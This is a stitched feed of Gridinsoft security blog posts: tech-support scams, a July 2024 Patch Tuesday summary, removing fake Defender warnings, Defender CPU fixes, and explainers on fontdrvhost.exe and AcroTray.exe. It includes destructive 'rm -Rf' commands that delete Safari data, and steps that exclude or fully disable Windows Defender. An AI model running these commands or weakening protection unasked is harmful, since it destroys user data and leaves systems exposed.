Initially, scammers need to make the user open the scam website. As these pages typically sit on some obscure URL, hoping for organic traffic is not an option. What they do instead is buy redirect link placements on shady websites whose content, in turn, attracts a lot of users. Sites with pirated films, dodgy online dating services, resources that offer cheats for popular games or shady hacking activities – such places never turn down an illegal source of profit. Any click on any content on these sites may redirect the user to a tech support scam page. Other scams appear on such sites as well, so it is a bad idea to keep using them.

Not sure whether you can trust a website? Consider scanning it with our website reputation checker! In less than a minute, it will give you a clear indication of whether the site is trustworthy.

    Culmination

After the user gets to the website, the inner mechanisms of the Ads(exe).finacetrack(2).dll site lock them on the page. Blocking any visible way out makes it particularly difficult for the user to avoid panicking, especially for someone with less computer experience. As a result, the only option that appears viable is to call the “support” at the specified number.

    The Finale

In the final stage, on the call with the fake tech support manager, the victim gets instructions to install a remote access tool, usually TeamViewer. After that, the fraudster on the phone instructs the victim to grant them access to the system. Upon taking control of the victim’s machine, the scammer typically downloads a bunch of unwanted applications. Fake browser security apps, questionable antivirus software no one has ever heard of, driver updating utilities – plenty of them.

    Such applications will further spam the user, reminding them about the “dangerous viruses” and asking to buy a license. Sure enough, it is nowhere near as dangerous as malware, but still quite annoying and can easily lead to money loss. Also, since such apps are not tested properly, some of their actions can make the system malfunction.

    How to Avoid the Ads(exe).finacetrack(2).dll scam?

As such scams typically propagate through sites with shady content – pirated movies and programs, dating or adult websites – the best way to prevent fake support scams from appearing is to avoid such sites in the future. Overall, their content is illegal and unhealthy; they typically carry massive amounts of ads that can expose the visitor to even more dangers. If you are not sure whether a site is safe to use, check it with our free online URL scanner service.

    Another part of the advice is to have a clear understanding of how Windows operates in general. Microsoft never blocks someone’s system, and never displays any notifications in the browser. Even if there is malware running in the computer, you will only get a message from Microsoft Defender, and that is it. Any attempt to look like a genuine Microsoft website, especially with such an obscure URL, is a giant red flag.

    Finally, I will advise you to run a proper anti-malware application, like GridinSoft Anti-Malware. It will reliably protect you against malicious programs, and will also block any malicious sites, thanks to its Online Protection feature.

Microsoft Fixes 3 Critical Vulnerabilities in July Patch Tuesday, One Exploited (https://gridinsoft.com/blogs/microsoft-fixes-3-critical-vulnerabilities-patch-tuesday/, Thu, 11 Jul 2024)

    Microsoft has released its monthly security update, addressing 142 vulnerabilities across its product suite and software. One of these vulnerabilities is already being exploited in the wild. The vulnerabilities were fixed as part of Microsoft’s monthly bug fix release, widely known as “Patch Tuesday”.

    Microsoft Fixed 3 Critical Flaws in Patch Tuesday

    In the most recent Patch Tuesday, on July 10, 2024, Microsoft released fixes for 142 security issues in its product suite and software. Among them are 6 flaws of different severity – CVE-2024-38023, CVE-2024-38060, CVE-2024-38080 and RCE bugs CVE-2024-38074, CVE-2024-38076, and CVE-2024-38077. The latter three have a CVSS score of 9.8 and allow an attacker to send specially crafted network packets that could trigger remote code execution in the Windows Remote Desktop Licensing service. Moreover, the last vulnerability does not require authentication, making it particularly dangerous.

    Windows Updates menu screenshot
    Windows Updates menu

    Notably, this is the largest list of fixes in recent months, nearly matching the April patch release where Microsoft fixed 150 vulnerabilities. The patches address vulnerabilities affecting multiple segments of Microsoft products. These include Windows, Office, Azure, .NET, Visual Studio, SQL Server, and Windows Hyper-V. In particular, one of the vulnerabilities is already being actively exploited in real-world attacks.

    CVE-2024-38074, 38076, and 38077 Details

    Despite all of the RCE flaws being rated at CVSS 9.8, some of them require authenticated access or specific privileges to exploit. For instance, a vulnerability in Microsoft SharePoint Server requires site owner rights to execute arbitrary code. One of the most significant vulnerabilities is an issue in Windows Hyper-V, which allows attackers to gain system privileges. To understand the severity of these vulnerabilities, let’s delve into the details.

    CVE-2024-38023 vulnerability allows attackers with site owner rights in Microsoft SharePoint Server to execute arbitrary code on the server. An attacker with the necessary privileges can use specially crafted commands to execute code in the context of SharePoint Server. This vulnerability is particularly dangerous because it can lead to complete control over the server and leakage of confidential information.

Another remote code execution vulnerability (CVE-2024-38060) stems from a flaw in the Microsoft Windows codec library. It allows an attacker to upload a specially crafted TIFF file which, when processed by the system, triggers arbitrary code execution. However, to exploit this vulnerability, the attacker must already have access to the system, making it less dangerous than remote attacks, but still posing a significant risk.

    The third vulnerability, CVE-2024-38080, is already actively exploited in real-world attacks. Attackers can use this vulnerability to escalate privileges in Windows Hyper-V, gaining access to system-level privileges. This can lead to complete control over virtualized environments, posing a serious threat to the security and integrity of the systems.

    How to Stay Safe?

    Vulnerabilities are an inherent part of software — past, present, and future. The only effective method to mitigate their risks is timely patching. To minimize these risks, Microsoft strongly recommends promptly installing the latest updates that address these vulnerabilities. And, well, despite the fact that Redmond tries its best to fix all the known flaws in time, there may be slip-throughs, even ones that exist for over a year.

Another layer of protection against exploitation is a zero-trust anti-malware solution. Not many are available for home users, but vulnerability exploitation typically targets systems in corporate networks to begin with. A robust solution that thoroughly checks every action of any software, which is the essence of a zero-trust policy, is the most effective against such attacks.

Windows Defender Security Warning (https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/, Tue, 02 Jul 2024)

    Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can quickly get rid of it. Here, we will explain how to remove this scam and protect yourself from other viruses.

    What is the Windows Defender Security Warning?

    This warning is the result of scareware or a phishing scam. Its purpose is to redirect you to a webpage that visually resembles the official Microsoft website. However, the URL does not match the official site. The page may display a message claiming that your computer is infected with malware and that you need to contact a support agent by phone to fix the problem.

    Fake Windows Defender Security Warning
    Windows Defender Security Warning scam example. Red flags are highlighted in the picture.

Unfortunately, the notification looks like a legitimate Windows message, making it especially dangerous – many users may not even attempt to verify it on Google. Scammers commonly make the pop-up as convincing as possible so that people don’t suspect anything is wrong. The provided phone number will likely connect you to a fraudulent call center. The agent may try to get you to install malware to infect your computer, steal your personal information, or demand money for fake services.

    Why is the Windows Defender Security Warning False?

    At first glance, you might mistake this for a legitimate warning from Windows Defender. However, if you’re familiar with Windows Defender, you’ll notice differences from a genuine notification. Therefore, please do not call the phone number provided in the window because it is not a real alert. Here’s why:

    • It’s not the Windows Defender interface. Windows Defender, also known as Windows Security, is a built-in Windows application with a different interface. It will never display a browser pop-up or webpage; it uses system notifications instead.
    • Strange text and typos. A banner or page showing a Microsoft Defender alert often contains strange text designs and grammatical and stylistic errors, which sharply contrast with the short and informative Defender notifications.
    • Microsoft never provides contact numbers for users. Users can contact Microsoft support through the “Get Help” application if they encounter problems.

    This Windows Defender security alert is flawed in both format and content. It’s often a low-level phishing scam aiming to sell a rogue antivirus service, which can harm your computer. In some cases, you might not be able to close the alert or switch to other applications.

    Causes of the Windows Defender Security Warning

    There are several reasons why you might see a Windows Defender security warning. Here are the most common ones:

    • You clicked on an ad that redirected you to a fake site.
    • You visited a hacked website that redirected you to a fraudulent page.
    • You have a malicious program installed on your device, often a result of adware activity.

    There are also many other ways you could be exposed to fraud, depending on various factors, such as the external devices you share with others. Simply closing the window may not solve the problem, especially if adware is causing it. The pop-up message may appear every time you open your browser.

    How to Remove the Windows Defender Security Warning

    Since the Windows Defender security warning appears in your browser, most actions to get rid of it are related to your browser. These steps can help resolve the issue of Windows Defender security warning pop-ups:

    • Force close and reopen your browser.
    • If the problem with redirecting to a fraudulent page persists, reset your browser (instructions below) or reinstall the browser completely.
    • If this continues, you may have adware or a PUP (potentially unwanted program) installed on your computer, and you need to remove it.

    If you’re unsure which installed application is causing the pop-up notifications, install antivirus software to detect and remove the infection from your computer.

    How to Clear the Browser from the Windows Defender Security Warning

    Resetting your browser settings is one of the first steps to eliminate the Windows Defender security warning scam. Here are the instructions for different browsers:

    Remove the Windows Defender Scam from Chrome

1. Click on the three vertical dots in the top right corner and select Settings.
  How to open Chrome settings
2. Select Reset and Clean up, then Restore settings to their original defaults.
  Restore settings button
3. Click Reset settings.
      Reset settings button for fix Windows Defender Security Warning

    Remove the Windows Defender Scam from Firefox

    1. Click the three-line icon in the upper right corner and select Help
      How to find Firefox reset settings
    2. Select More Troubleshooting Information
      Next step to Firefox reset
    3. Select Refresh Firefox… then Refresh Firefox
      Refresh Firefox can help to remove Windows Defender Security Warning

    Remove the Windows Defender Scam from Microsoft Edge

    1. Press the three dots
      How to reset Edge settings. Step 1
    2. Select Settings
      How to reset Edge settings. Step 2 - Settings
3. Click Reset Settings, then click Restore settings to their default values.
      Restore Edge settings for solve Windows Defender Security Warning
Remove the Windows Defender Scam from Safari

1. Open the terminal (press ⌘ Command + Spacebar to open Spotlight, type “terminal” and press “Enter”).
2. Enter these commands one at a time, pressing “Enter” after pasting each into the terminal. Note that they also delete Safari’s caches, bookmarks (Bookmarks.plist) and saved window state, so export your bookmarks first if you want to keep them:

    rm -Rf ~/Library/Caches/Metadata/Safari;
    rm -Rf ~/Library/Caches/com.apple.Safari;
    rm -Rf ~/Library/Caches/com.apple.WebKit.PluginProcess;
    rm -Rf ~/Library/Preferences/Apple\ -\ Safari\ -\ Safari\ Extensions\ Gallery;
    rm -Rf ~/Library/Preferences/com.apple.Safari.LSSharedFileList.plist;
    rm -Rf ~/Library/Preferences/com.apple.Safari.RSS.plist;
    rm -Rf ~/Library/Preferences/com.apple.Safari.plist;
    rm -Rf ~/Library/Preferences/com.apple.WebFoundation.plist;
    rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginHost.plist;
    rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginProcess.plist;
    rm -Rf ~/Library/PubSub/Database;
    rm -Rf ~/Library/Safari/*;
    rm -Rf ~/Library/Safari/Bookmarks.plist;
    rm -Rf ~/Library/Saved\ Application\ State/com.apple.Safari.savedState;

      What to Do if the Problem Persists?

If you have followed all the steps above and still see this warning every time you use a web browser, it is a clear sign that malware is still on your computer. You can use professional antimalware software such as GridinSoft Anti-Malware to scan your computer and remove any viruses or malware found. Besides removing the cause of the pop-ups, the antimalware software will also neutralize more dangerous cyber threats that could cause severe damage to your files.

      GridinSoft Anti-Malware main screen

      Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

      After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

      Scan results screen

      Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

      Removal finished

      How to Avoid Scams like the Windows Defender Security Warning

      As mentioned earlier, the Windows Defender security warning scam is not the only threat you may encounter on your computer. There is much more severe malware on the Internet, and as a prudent user, you should take every precaution to avoid them. Here are some basic tips:

      • Ensure your OS and apps are up to date
      • Only download apps from official websites
      • Avoid clicking on random links without knowing where they will take you
      • Don’t download suspicious apps
      • Do not open attachments in suspicious emails
      • Use an ad blocker to block malicious ads
      • Use advanced antivirus software

      Your computer should now be clean and free of Windows Defender scams. To prevent this from happening again, practice good online hygiene to protect yourself from fraud. Perform regular scans and use malware protection to stop threats before they happen.

Antimalware Service Executable (https://gridinsoft.com/blogs/antimalware-service-executable-high-cpu-memory-fix/, Fri, 14 Jun 2024)

      Antimalware Service Executable is a system process that belongs to Windows Defender. Usually, it does not cause any issues, and the user does not notice it. In some cases, it can consume an abnormal amount of resources. I have compiled some practical solutions to address this problem in this article.

      What is Antimalware Service Executable?

The Antimalware Service Executable is a core process of Microsoft Windows Defender, the built-in antivirus software in Windows. This process, also known as MsMpEng.exe, runs in the background to provide real-time protection against malware and other security threats. However, some users complain that this process consumes an excessive amount of resources at times, which makes the PC uncomfortable to use.

      Antimalware service executable high cpu

There are several factors responsible for this. First, Defender periodically performs a full scan, analyzing every file in the system. Such a process requires a lot of resources, so some devices start to slow down. Second, like most modern anti-malware solutions, Defender uses heuristic detection to check certain elements with special attention, potentially causing temporary system slowdowns.

Although all anti-malware solutions consume a significant amount of resources during a scan, none of the third-party ones have the annoying habit of starting a scan sporadically. Also, due to certain bugs, Defender may simply hang at a certain point of the scanning process, keeping resource consumption high. Let me explain how to fix this behavior.

Resolving Antimalware Service Executable High CPU Consumption

      There are several ways to solve the problem of excessive resource consumption by Defender. They are not complicated, but they do require some action from the user:

      Disable Scheduled Scans in Task Scheduler

      The main reason for Antimalware Service Executable high CPU consumption is that Defender runs a full scan, regardless of whether the user is actively using the device or the system is idling. The solution is to set a specific time for Defender to perform a full system scan. This is something like Active Hours in the Windows Update section, which does not apply to Defender’s activity for some reason. To change the scan schedule, press Start, type “Task Scheduler”, and open it.

      Antimalware Service Executable high memory

In the left pane, click Task Scheduler Library, then navigate to Library→Microsoft→Windows→Windows Defender. You will see Windows Defender Scheduled Scan, Windows Defender Cache Maintenance, Windows Defender Cleanup, and Windows Defender Verification in the middle pane as you open the Windows Defender folder. All four of these tasks need to undergo the following procedure.

      Disable scheduled scans Defender

      We will start with Windows Defender Scheduled Scan. Double-click on it, click the Conditions tab, and uncheck all options to clear scheduled scans.

      Disable scheduled scans, enable triggers

      Now, you must create a trigger to call a task at a certain time. To do this, go to the “Triggers” section and click “New…”.

      Select a time that will not interfere with your activities, choose “Daily”, and set how often Defender will perform the scan (by default, it is recurring every day), then click “OK”. If you do not need the scans to happen at all, you can just keep this parameter at “Disabled”. Repeat these actions for each item.

      Exclude MsMpEng.exe from Scans

One particular place where Microsoft Defender may have issues is while scanning its own files. The highest privileges this program runs with obviously conflict with themselves when it comes to scanning its own files. To fix this silly issue, open Task Manager and find Antimalware Service Executable in the processes list. Right-click on it and select Open File Location in the drop-down menu.

      MsMpEng.exe file location

      In the opened window, you need to copy the full path of the Antimalware Service Executable. Click on the address bar with the right mouse button and press “Copy path”.

      MsMpEng copy path

      Now launch Windows Defender. You can use the Start Menu search bar to input Windows Defender right there and open the first found item.

      Windows Defender screenshot

      In the opened Windows Defender Security Center, go to “Virus & threat protection” → Virus & threat protection settings.

      MS Defender set exclusions

Scroll the settings down to Exclusions and click “Add or remove exclusions”. On the opened screen, press “Add an exclusion”, select Folder, and paste the path from your clipboard. Click Open, and Windows Defender will no longer scan the folder where Antimalware Service Executable is located.

Disabling the On-run Protection

This method is the quickest, but only a temporary solution: it disables Defender’s background protection until the next system startup. Open Defender, click “Virus & threat protection”, and select “Manage settings”. Switch all the toggles to the “Off” position.

      Defender protection settings screenshot

      Completely Disable Windows Defender

      I strongly advise against completely disabling Defender, as it puts your system at risk. However, if you accept all the risks, follow the instructions carefully, as changing various registry settings can lead to serious system problems.

      Regedit

Open Registry Editor (press Win+R, type regedit, and press Enter). In the opened Registry Editor, navigate to the following path using the navigation pane on the left side of the window: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

      DisableAntiSpyware registry entry

      Right-click the right pane of the Registry Editor window and, in the dropdown menu, select: New → DWORD (32-bit) Value. Name this entry DisableAntiSpyware. Double-click the entry and set its value to 1.
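Before (and after) changing any of the settings described in the sections above by hand, it helps to see their current state in one place. The following PowerShell function is an added example and not code from the Gridinsoft post or from Microsoft; it only reads configuration and writes nothing. It assumes Windows 10/11 with the built-in Defender module (Get-MpPreference, Get-MpComputerStatus) and an elevated session, and it reports the four scheduled tasks from the Task Scheduler section, the scan schedule and exclusion lists, whether the MsMpEng.exe folder is already excluded, the real-time protection toggles, and the DisableAntiSpyware policy value from the Registry Editor step.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the Gridinsoft post: a read-only audit of the
# Defender settings the article changes by hand (scheduled scan tasks, scan
# schedule, exclusions, real-time protection, DisableAntiSpyware policy value).
# Assumes Windows 10/11 with the built-in Defender PowerShell module.

function Get-DefenderAudit {
    [CmdletBinding()]
    param()

    $audit = [ordered]@{}

    # 1. The tasks under Task Scheduler Library > Microsoft > Windows > Windows Defender
    $tasks = Get-ScheduledTask -TaskPath '\Microsoft\Windows\Windows Defender\' -ErrorAction SilentlyContinue
    $audit.ScheduledTasks = @(foreach ($task in $tasks) {
        [pscustomobject]@{
            Task     = $task.TaskName
            State    = $task.State
            # Each trigger is a CIM object such as MSFT_TaskDailyTrigger; an empty list means no trigger
            Triggers = @($task.Triggers | ForEach-Object {
                '{0} (start {1}, enabled {2})' -f $_.CimClass.CimClassName, $_.StartBoundary, $_.Enabled
            })
        }
    })

    # 2. Preference-level scan schedule and exclusion lists
    $pref = Get-MpPreference
    $audit.ScanScheduleDay    = $pref.ScanScheduleDay      # 0 = every day, 8 = never
    $audit.ScanScheduleTime   = $pref.ScanScheduleTime
    $audit.ExclusionPaths     = @($pref.ExclusionPath)
    $audit.ExclusionProcesses = @($pref.ExclusionProcess)

    # 3. Where MsMpEng.exe runs from (same folder Task Manager shows) and whether it is excluded
    $engine = Get-CimInstance -ClassName Win32_Process -Filter "Name = 'MsMpEng.exe'" |
        Select-Object -First 1
    $audit.EngineFolder = if ($engine -and $engine.ExecutablePath) {
        Split-Path -Path $engine.ExecutablePath -Parent
    } else { $null }
    $audit.EngineFolderExcluded = [bool]($audit.EngineFolder -and
        ($audit.ExclusionPaths | Where-Object { $_ -eq $audit.EngineFolder }))

    # 4. The "Manage settings" toggles and tamper protection
    $status = Get-MpComputerStatus
    $audit.RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
    $audit.AntivirusEnabled          = $status.AntivirusEnabled
    $audit.IsTamperProtected         = $status.IsTamperProtected

    # 5. The policy value the article sets by hand; this script only reads it
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $audit.DisableAntiSpyware = (Get-ItemProperty -Path $policyKey -Name DisableAntiSpyware `
        -ErrorAction SilentlyContinue).DisableAntiSpyware

    [pscustomobject]$audit
}

Get-DefenderAudit | Format-List
```

Two things this report makes visible that the manual steps do not: anything inside an excluded folder is never scanned, so the exclusion list deserves a periodic review and should stay as short as possible; and Microsoft documents DisableAntiSpyware as deprecated, with current Windows 10/11 client builds ignoring it and tamper protection blocking such changes, so IsTamperProtected next to the registry value tells you whether the registry step will have any effect at all.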

      Use an Alternative Solution

      If you still decide to stop using Windows Defender, you can use alternative solutions from third-party developers. GridinSoft Anti-Malware is an excellent alternative to the standard Windows solution. Moreover, it has several advantages, including optimization—the application consumes a moderate amount of resources during a full scan, allowing for comfortable use even on devices with less powerful hardware.

      Additionally, GridinSoft Anti-Malware includes an Internet Security module, which blocks phishing and potentially unsafe websites. Furthermore, using this tool does not require disabling Windows Defender, allowing you to use both solutions simultaneously, complementing each other.

      Antimalware Service Executable

      The post Antimalware Service Executable appeared first on Gridinsoft Blog.

      ]]>
      https://gridinsoft.com/blogs/antimalware-service-executable-high-cpu-memory-fix/feed/ 0
      Usermode Font Driver Host (fontdrvhost.exe) https://gridinsoft.com/blogs/usermode-font-driver-host-high-cpu-and-memory/ https://gridinsoft.com/blogs/usermode-font-driver-host-high-cpu-and-memory/#respond Thu, 13 Jun 2024 09:14:41 +0000 https://gridinsoft.com/blogs/?p=20591 The Usermode Font Driver Host process is an important part of the Windows operating system. It may raise questions among users due to its high consumption of resources such as CPU and memory. Let’s find out what this process is and whether you can do without it. What is Usermode Font Driver Host? The Usermode […]

      The post Usermode Font Driver Host (fontdrvhost.exe) appeared first on Gridinsoft Blog.

      The Usermode Font Driver Host process is an important part of the Windows operating system. It may raise questions among users due to its high consumption of resources such as CPU and memory. Let’s find out what this process is and whether you can do without it.

      What is Usermode Font Driver Host?

The Usermode Font Driver Host, as its name suggests, hosts the font driver in user mode: it parses font files and serves glyph rendering requests so that text can be displayed in applications and in the Windows interface. The genuine process runs from the system directory, C:\Windows\System32\fontdrvhost.exe. Anything that needs fonts rendered goes through it, from basic text display to complex font formatting in documents and web pages.


In recent Windows builds, Task Manager shows fontdrvhost.exe running under a user name such as “UMFD-0”. UMFD stands for User Mode Font Driver, and the number is the session the instance serves: UMFD-0 handles session 0 (services), UMFD-1 the first interactive desktop, and so on, so seeing two instances is normal. Each runs with a heavily restricted token inside an AppContainer sandbox that can do little beyond parsing fonts. That isolation is the security improvement: font parsing used to happen in the kernel, where a malformed font file could crash or compromise the whole system, whereas a crash in the sandboxed host affects only that process.

      Usermode Font Driver Host High CPU and Memory Troubleshooting

High CPU or memory use by the Usermode Font Driver Host usually has one of a few causes. The first is simply heavy font work: graphics editors, design tools, or a large number of non-standard fonts loaded at once.

Alternatively, it can be caused by a fault in the Windows font management system. When corrupted or badly built fonts are installed, fontdrvhost.exe may burn resources trying to parse them.

Less often, the problem is a damaged fontdrvhost.exe binary or one of the system files it depends on. There are two ways to address that: a system file scan, or a Windows update. Start with the least invasive one.

      Step 1: Run System File Checker

Windows ships with its own repair utilities; for corrupted system files the tool to reach for is System File Checker.

1. Open an elevated Command Prompt: type cmd in the search box and click “Run as administrator”.
2. Type sfc /scannow and press Enter.
3. Wait for the scan to complete. SFC compares protected system files against the copies in the component store and replaces any that have been altered.
4. Restart your computer after the scan.

If System File Checker reports files it could not repair, or the problem persists, first repair the component store that SFC draws from with DISM /Online /Cleanup-Image /RestoreHealth and run sfc /scannow again. Failing that, updating Windows replaces system files wholesale and may fix the underlying problem.

      Step 2: Update Windows

Windows Update can resolve high resource consumption caused by an incompatibility or a faulty system module, since each cumulative update carries bug fixes and performance improvements that Microsoft derives from user reports and diagnostic data. To check for updates, press the Windows key + I and choose “Windows Update”. If any updates are available, download and install them.

      Step 3: Removing damaged fonts

As noted above, fontdrvhost.exe can spend excessive resources trying to process corrupted fonts. Remove fonts that were installed recently or that you suspect are damaged.

      To do this, go to Control Panel > Fonts.


      Then, remove fonts that fall under the following description:

      • The font is not compatible with your encoding language
      • Downloaded from unreliable sources
      • Font is repeated several times
      • Not used for a long time

      Can I Stop or Disable Usermode Font Driver Host?

The Usermode Font Driver Host is a core component: every application that draws text in a user session goes through it, so Windows does not work properly without it. Do not kill or delete the process; the genuine fontdrvhost.exe is not harmful. What is worth checking is whether the process you are looking at is the genuine one: it should run from C:\Windows\System32, be signed by Microsoft, and run as the UMFD-N account for its session. Unusual behaviour attributed to fontdrvhost.exe, or system instability in general, is more often a symptom of something else, possibly malware using the name as cover.

Therefore, it is wise to run a comprehensive scan for viruses and malware to confirm the system's integrity. A reliable tool for this task is Gridinsoft Anti-Malware. It is designed to detect and remove malware, including threats that masquerade as legitimate system processes or abuse them to carry out malicious activity. Regular scanning helps keep the system healthy and guards against such threats.

      Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

      After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.


      Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

AcroTray.exe
https://gridinsoft.com/blogs/acrotray-exe/
Thu, 13 Jun 2024 05:56:07 +0000

      The post AcroTray.exe appeared first on Gridinsoft Blog.

      The Acrotray.exe process is one of the important components provided by Adobe Systems. This process is associated with Adobe Acrobat software and often starts automatically when the Windows operating system starts. However, not every user knows what this process is, what it is for and whether it is safe. Let’s do a complete technical analysis of this process, its functionality, and security.

      AcroTray.exe – What is it?

AcroTray.exe is an executable file that is part of the Adobe Acrobat package. It supports PDF-related functions such as document conversion, creation and editing directly from the desktop, without opening Adobe Acrobat itself. In addition, AcroTray.exe helps manage licenses and updates for Adobe products, which matters to enterprise users who need to keep those components current.


The Acrotray.exe process usually starts at system startup and runs in the background, providing quick access to Adobe features. This includes integration with applications such as Microsoft Office, where Acrotray.exe acts as an intermediate layer for exporting and importing PDF documents. Technically, the process is safe and useful to Acrobat users, but its constant presence among running processes may raise the question of whether it needs to run at all.

      Main Functionalities:

      • The ability to convert documents to PDF format from various applications such as Microsoft Office (Word, Excel, and others) without opening Adobe Acrobat.
• Help with printing PDF documents: it takes part in setting print options right before printing, which improves the quality and accuracy of the printed output.
      • Automated update checks for Adobe Acrobat and other Adobe components.
      • Management for various plug-ins and add-ons for Adobe Acrobat, ensuring that they work properly and interact with the main program.
      • Informer functions, providing notifications of new features, offers, or changes to Adobe services.

      Acrotray.exe is Missing – Fixing Guide

A missing Acrotray.exe file can be a real nuisance for Adobe Acrobat users: the program may not work properly, or throw errors at startup or when performing certain functions such as viewing or printing PDF documents. Here are a few steps to resolve this:

Repairing the program via Control Panel can restore missing files, including Acrotray.exe.

      1. Close the Adobe Acrobat program and all Acrobat processes from Task Manager.
      2. Then open “Control Panel” → “Programs” → “Programs and Features” → “Uninstall a program” and click “Adobe Acrobat DC”.
      3. Press “Change” and choose “Repair” in the dialog box.
      4. After the program repair is complete, restart your PC.

      In case repair did not help, reinstall the program. For this, uninstall the program in the same Control Panel and restart the computer. Install Adobe Acrobat downloaded from the official website.

      AcroTray.exe – Is it a Virus?

As I wrote above, AcroTray.exe is a completely legitimate file. Still, as with any other executable, its name can be borrowed by a virus or other malware. The first thing to check is its location. The correct path is:

C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroTray.exe
– for modern versions of Adobe Acrobat

C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\AcroTray.exe
– for older versions of Adobe Acrobat (11 and under)

64-bit builds of Acrobat DC install under C:\Program Files\Adobe\Acrobat DC\Acrobat instead.

Location alone is not proof, since malware running with enough rights can drop a file into those folders too; the stronger check is the file's digital signature.

To verify AcroTray.exe, you can start from Task Manager:

• Press Ctrl+Shift+Esc to open Task Manager.
• In the list of processes, find AcroTray.exe, right-click it and select “Open file location”. This opens the folder the running executable was started from.
• Right-click the AcroTray.exe file and select “Properties”.
• Check the “Details” tab for the description, product name and version, then the “Digital Signatures” tab for the signer. Legitimate Adobe files are signed by Adobe Inc. (older releases: Adobe Systems Incorporated); select the signature and click “Details” to confirm that it reads “This digital signature is OK”.

Attackers may use the name AcroTray to disguise their malware, a common trick for backdoors and coin miners. If you find an AcroTray.exe in an unusual location, such as AppData\Roaming or AppData\Local\Temp, if it is unsigned or signed by someone other than Adobe, or if its behaviour is suspicious (such as excessive use of system resources), treat it as a sign of infection.
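The location and signature checks described here, and in the fontdrvhost.exe section above, scripted so they can be run on many machines. This is an added example, not code from Gridinsoft, Microsoft or Adobe; it assumes the two Acrobat paths listed above plus the 64-bit Acrobat DC location under C:\Program Files (an assumption, not stated in the post), and that it runs from an elevated PowerShell so that processes of other users, including the UMFD-N font driver hosts, are visible.

```powershell
# Added example (not from the original post): check that a running process's
# binary sits in an expected directory and carries a valid Authenticode
# signature from the expected publisher. Covers both cases discussed on this
# page: fontdrvhost.exe (System32, signed by Microsoft, one instance per
# session owned by UMFD-<session>) and AcroTray.exe (Program Files, signed by
# Adobe). Run from an elevated PowerShell so other users' processes are visible.

function Test-ProcessBinary {
    param(
        [Parameter(Mandatory)] [string]   $Name,            # process name without .exe
        [Parameter(Mandatory)] [string[]] $ExpectedDirs,    # directories the binary may legitimately run from
        [Parameter(Mandatory)] [string]   $ExpectedSigner   # text expected in the signer's subject, e.g. 'Microsoft Windows' or 'Adobe'
    )

    $procs = Get-CimInstance Win32_Process -Filter "Name = '$Name.exe'"
    if (-not $procs) {
        Write-Host "$Name.exe is not running."
        return
    }

    foreach ($p in $procs) {
        $owner   = Invoke-CimMethod -InputObject $p -MethodName GetOwner
        $path    = $p.ExecutablePath
        $verdict = @()

        if (-not $path) {
            $verdict += 'path not readable (run elevated)'
        } else {
            # Location check: the directory must be one of the expected ones
            # (-notcontains compares strings case-insensitively).
            $dir = Split-Path -Path $path -Parent
            if ($ExpectedDirs -notcontains $dir) { $verdict += "unexpected location: $dir" }
            # The drop zones the article warns about.
            if ($path -match '\\AppData\\(Roaming|Local\\Temp)\\') { $verdict += 'runs from AppData' }

            # Signature check: a valid, trusted signature from the expected publisher.
            # OS binaries such as fontdrvhost.exe are catalog-signed; the cmdlet handles that.
            $sig = Get-AuthenticodeSignature -FilePath $path
            if ($sig.Status -ne 'Valid') {
                $verdict += "signature status: $($sig.Status)"
            } elseif ($sig.SignerCertificate.Subject -notmatch [regex]::Escape($ExpectedSigner)) {
                $verdict += "unexpected signer: $($sig.SignerCertificate.Subject)"
            }
        }

        $summary = if ($verdict) { $verdict -join '; ' } else { 'OK' }
        [pscustomobject]@{
            PID     = $p.ProcessId
            Session = $p.SessionId
            Owner   = "$($owner.Domain)\$($owner.User)"
            Path    = $path
            Verdict = $summary
        }
    }
}

# fontdrvhost.exe: expect one row per session, owned by "Font Driver Host\UMFD-<session>".
Test-ProcessBinary -Name 'fontdrvhost' -ExpectedDirs @("$env:SystemRoot\System32") -ExpectedSigner 'Microsoft Windows' |
    Format-Table -AutoSize

# AcroTray.exe: the two 32-bit install paths from the article, plus the 64-bit
# Acrobat DC location under Program Files (assumption, not stated in the post).
Test-ProcessBinary -Name 'AcroTray' -ExpectedDirs @(
    "${env:ProgramFiles(x86)}\Adobe\Acrobat DC\Acrobat",
    "${env:ProgramFiles(x86)}\Adobe\Acrobat 11.0\Acrobat",
    "$env:ProgramFiles\Adobe\Acrobat DC\Acrobat"
) -ExpectedSigner 'Adobe' |
    Format-Table -AutoSize
```

Win32_Process is used instead of Get-Process because it exposes the session ID and the owning account, which is how you see that fontdrvhost.exe runs once per session under its own UMFD-N virtual account. Any row whose Verdict is not OK deserves a closer look; a copy under AppData with a missing or foreign signature is exactly the impostor the article describes.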


      On the other hand, if you want to completely uninstall AcroTray.exe, you can uninstall the entire Adobe Acrobat package if you don’t need it. To do this, open “Control Panel” → “Programs and Features“, find Adobe Acrobat and select “Uninstall“.

      Nevertheless, to make sure that AcroTray.exe file is safe, it is recommended to perform an antivirus scan. One reliable tool for this purpose is Gridinsoft Anti-Malware. This antivirus specializes in detecting and eliminating various types of malware, including those that can hide under the guise of legitimate system files.

Windows Defender Security Warning
https://gridinsoft.com/blogs/windows-defender-security-warning/
Fri, 07 Jun 2024 16:43:55 +0000

